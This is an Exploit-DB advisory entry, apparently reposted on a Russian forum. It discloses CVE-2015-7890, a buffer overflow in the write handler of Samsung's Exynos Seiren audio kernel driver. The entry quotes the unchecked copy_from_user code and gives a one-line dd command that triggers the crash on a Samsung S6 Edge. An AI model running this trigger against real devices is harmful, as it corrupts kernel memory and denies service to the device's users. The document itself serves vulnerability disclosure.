- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 38556
- Проверка EDB
-
- Пройдено
- Автор
- GOOGLE SECURITY RESEARCH
- Тип уязвимости
- DOS
- Платформа
- ANDROID
- CVE
- cve-2015-7890
- Дата публикации
- 2015-10-28
Samsung - 'seiren' Kernel Driver Buffer Overflow
Код:
Source: https://code.google.com/p/google-security-research/issues/detail?id=491
The Exynos Seiren Audio driver has a device endpoint (/dev/seiren) that is accessible by either the system user or the audio group (such as the mediaserver). It was found that the write() implementation for this driver contains a buffer overflow vulnerability that overflow a static global buffer:
static ssize_t esa_write(struct file *file, const char *buffer,
size_t size, loff_t *pos)
{
struct esa_rtd *rtd = file->private_data;
unsigned char *ibuf;
…
ibuf = rtd->ibuf0;
...
/* receive stream data from user */
if (copy_from_user(ibuf, buffer, size)) {
esa_err("%s: failed to copy_from_user\n", __func__);
goto err;
}
Note that the user supplied buffer and size parameters are not adequately bounds checked. The destination buffer is fixed size, so memory corruption can occur. A simple proof-of-concept from a privileged shell can be used to trigger the issue (tested on a Samsung S6 Edge):
# dd if=/dev/zero of=/dev/seiren count=5000000- Источник
- www.exploit-db.com
